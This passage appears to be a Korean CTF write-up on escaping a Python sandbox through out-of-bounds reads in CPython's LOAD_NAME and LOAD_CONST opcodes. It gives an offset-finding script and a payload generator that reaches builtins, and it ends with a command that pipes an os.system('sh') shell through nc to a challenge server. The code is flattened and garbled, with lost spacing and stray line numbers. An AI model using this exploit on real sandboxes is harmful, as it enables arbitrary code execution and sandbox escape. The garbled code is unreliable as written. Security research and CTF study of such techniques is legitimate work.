LOAD_NAME / LOAD_CONST opcode의 OOB read 기능을 사용하여 메모리에서 일부 심볼을 가져올 수 있습니다. 이는 (a, b, c, ... 수백 개의 심볼 ..., __getattribute__) if [] else [].__getattribute__(...)와 같은 트릭을 사용하여 원하는 심볼(예: 함수 이름)을 가져올 수 있음을 의미합니다.
하지만 co_names이 빈 튜플이 되는 경우는 어떻게 될까요? LOAD_NAME 2 옵코드는 여전히 실행되고, 원래 그 메모리 주소에서 값을 읽으려고 시도합니다. 네, 이것은 out-of-bound read "기능"입니다.
해결책에 대한 핵심 개념은 간단합니다. CPython에서 LOAD_NAME 및 LOAD_CONST와 같은 일부 옵코드는 OOB read에 취약합니다.
이들은 consts 또는 names 튜플에서 인덱스 oparg의 객체를 검색합니다 (co_consts 및 co_names가 내부적으로 지칭하는 것입니다). CPython이 LOAD_CONST 옵코드를 처리할 때 무엇을 수행하는지 알아보기 위해 다음 짧은 코드 조각을 참조할 수 있습니다.
case TARGET(LOAD_CONST): {PREDICTED(LOAD_CONST);PyObject *value =GETITEM(consts, oparg);Py_INCREF(value);PUSH(value);FAST_DISPATCH();}1234567
이 방법을 사용하여 OOB 기능을 사용하여 임의의 메모리 오프셋에서 "name"을 가져올 수 있습니다. 어떤 이름을 가지고 있는지와 오프셋이 무엇인지 확인하려면 LOAD_NAME 0, LOAD_NAME 1 ... LOAD_NAME 99 ...을 계속 시도하면 됩니다. 그리고 약 oparg > 700 정도에서 무언가를 찾을 수 있을 것입니다. 물론 gdb를 사용하여 메모리 레이아웃을 살펴볼 수도 있지만, 더 쉬울 것 같지는 않습니다.
Exploit 생성
이름 / 상수에 대한 유용한 오프셋을 검색한 후에는 해당 오프셋에서 이름 / 상수를 가져와 사용하는 방법은 어떻게 해야 할까요? 여기에 팁이 있습니다:
co_names=()와 함께 LOAD_NAME 5에서 __getattribute__ 이름을 가져올 수 있다고 가정해 봅시다. 그럼 다음과 같은 작업을 수행하면 됩니다:
[a,b,c,d,e,__getattribute__] if [] else [[].__getattribute__# you can get the __getattribute__ method of list object now!]1234
주목할 점은 __getattribute__로 이름을 지정할 필요가 없다는 것입니다. 더 짧거나 더 이상한 이름으로 지정할 수도 있습니다.
LOAD_ATTR는 co_names에서도 이름을 가져옵니다. Python은 이름이 동일한 경우 동일한 오프셋에서 이름을 로드합니다. 따라서 두 번째 __getattribute__는 여전히 offset=5에서 로드됩니다. 이 기능을 사용하여 이름이 메모리 근처에 있으면 임의의 이름을 사용할 수 있습니다.
숫자를 생성하는 것은 간단해야합니다:
0: not [[]]
1: not []
2: (not []) + (not [])
...
Exploit Script
길이 제한 때문에 상수를 사용하지 않았습니다.
먼저 여기에는 이름의 오프셋을 찾기 위한 스크립트가 있습니다.
from types import CodeTypefrom opcode import opmapfrom sys import argvclassMockBuiltins(dict):def__getitem__(self,k):iftype(k)==str:return kif__name__=='__main__':n =int(argv[1])code = [*([opmap['EXTENDED_ARG'], n //256]if n //256!=0else []),opmap['LOAD_NAME'], n %256,opmap['RETURN_VALUE'],0]c =CodeType(0, 0, 0, 0, 0, 0,bytes(code),(), (), (), '<sandbox>', '<eval>', 0, b'', ())ret =eval(c, {'__builtins__': MockBuiltins()})if ret:print(f'{n}: {ret}')# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
그리고 다음은 실제 Python 악용을 생성하기 위한 것입니다.
import sysimport unicodedataclassGenerator:# get numnerdef__call__(self,num):if num ==0:return'(not[[]])'return'('+ ('(not[])+'* num)[:-1] +')'# get stringdef__getattribute__(self,name):try:offset =None.__dir__().index(name)returnf'keys[{self(offset)}]'exceptValueError:offset =None.__class__.__dir__(None.__class__).index(name)returnf'keys2[{self(offset)}]'_ =Generator()names = []chr_code =0for x inrange(4700):whileTrue:chr_code +=1char = unicodedata.normalize('NFKC', chr(chr_code))if char.isidentifier()and char notin names:names.append(char)breakoffsets ={"__delitem__":2800,"__getattribute__":2850,'__dir__':4693,'__repr__':2128,}variables = ('keys','keys2','None_','NoneType','m_repr','globals','builtins',)for name, offset in offsets.items():names[offset]= namefor i, var inenumerate(variables):assert var notin offsetsnames[792+ i]= varsource =f'''[({",".join(names)}) if [] else [],None_ := [[]].__delitem__({_(0)}),keys := None_.__dir__(),NoneType := None_.__getattribute__({_.__class__}),keys2 := NoneType.__dir__(NoneType),get := NoneType.__getattribute__,m_repr := get(get(get([],{_.__class__}),{_.__base__}),{_.__subclasses__})()[-{_(2)}].__repr__,globals := get(m_repr, m_repr.__dir__()[{_(6)}]),builtins := globals[[*globals][{_(7)}]],builtins[[*builtins][{_(19)}]](builtins[[*builtins][{_(28)}]](), builtins)]'''.strip().replace('\n', '').replace(' ', '')print(f"{len(source) = }", file=sys.stderr)print(source)# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
기본적으로 다음과 같은 작업을 수행합니다. __dir__ 메서드에서 얻은 문자열에 대해 다음 작업을 수행합니다:
